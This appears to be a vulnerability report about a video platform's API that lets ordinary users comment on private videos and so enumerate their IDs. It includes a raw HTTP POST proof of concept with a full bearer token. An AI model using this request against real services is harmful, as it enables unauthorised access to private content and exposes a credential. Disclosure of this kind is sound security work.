The app doesn’t check the status of video when making data changes. Normal users can create new comment or reply comment in private videos.
POST /api/v1/videos/53328/comment-threads HTTP/2
Host: p.lu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer d8163b600e3de89c6039af034a94bd3898d68825
Content-Type: application/json
Content-Length: 16
Origin: https://p.lu
Referer: https://p.lu/w/87rzixn5tGiFBA5iojv9RP
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"text":"hello"}
send comment: https://drive.google.com/file/d/1qkNAeu5vSsdA7-PeWszHbIngiiLzk9u_/view?usp=sharing
comment in private video: https://drive.google.com/file/d/1jdIuH75caNHvTZob7vBtsvKkVKbz2pcF/view?usp=sharing
Attackers can create comment in private videos. It can be abused to list the id’s of private videos based on the response when making API call.